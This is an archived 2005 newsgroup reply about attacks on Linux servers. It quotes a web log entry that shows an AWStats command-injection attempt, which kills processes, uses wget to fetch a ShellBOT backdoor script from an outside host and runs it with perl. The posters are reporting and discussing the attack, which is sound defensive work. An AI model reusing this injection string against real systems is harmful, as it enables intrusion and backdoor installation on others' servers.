Home Messages Index
[Date Prev][Date Next][Thread Prev][Thread Next]
Author IndexDate IndexThread Index

Re: A Bitter Linux User in a World Dominated by an Inferior O/S

__/ [Tim Smith] on Thursday 13 October 2005 13:37 \__

> In article <dikn2f$2n3r$1@xxxxxxxxxxxxxxxxx>,
>  Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx> wrote:
>> I have yet another reason to hate Windows with /passion/. My Linux server
>> has come under heavy attacks by Windows machine that had been hijacked
>> and it's putting my Web host in jeopardy. Motive? Referrer spam that
>> comes with the visits en masse.
> I checked my logs to see if I have any of those, and I'm not getting
> hit.  However, I did notice this interesting item:
> - - [12/Oct/2005:19:24:45 -0700] "GET
> /awstats/awstats.pl?configdir=|echo%20;kill%20-9%20-1;cd%20/tmp;wget%20ht
> tp://jimi.springsips.com/~alicia/ice.txt%20;perl%20/tmp/ice.txt;a;echo%20
> ;echo| HTTP/1.1" 404 1021 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
> Windows 98)"
> Looks like someone is trying to exploit a problem with awstats on Unix
> systems.  Even though the user agent string claims Windows 98,
> is running Red Hat Linux.
> As of right now, you can run that wget command it is trying to do and
> get the script it wants to run.  It's a version of the ShellBOT
> backdoor, which has been around for a while:
> <http://forum.powweb.com/showthread.php?t=55648>
> It's kind of a nice break amid all the usual Windows malware crap I see
> in my web logs to actually run across some Unix malware that is actually
> in the wild and trying to spread. :-)


Speaking of the notorious AWStats exploit, this morning I read a message
from the head sysadmin at the Computer Science Department.

Somebody[1] questionably invoked AWStats from /tmp. It had to be assumed
that the attacker got a copy of the password file in the research domain.
All were forced to urgently change passwords. I occasionally notice
attempts to exploit (non-existing) AWStats on my domain. My AWStats
installation is behind an authentication wall.


[1]I am guessing an infiltration via SSH of which there are endless attempts
from the east

Roy S. Schestowitz      | "How do I set my laser printer on stun?"
http://Schestowitz.com  |    SuSE Linux    |     PGP-Key: 74572E8E
  2:25pm  up 49 days  2:39,  3 users,  load average: 0.28, 0.52, 0.54
      http://iuron.com - next generation of search paradigms

[Date Prev][Date Next][Thread Prev][Thread Next]
Author IndexDate IndexThread Index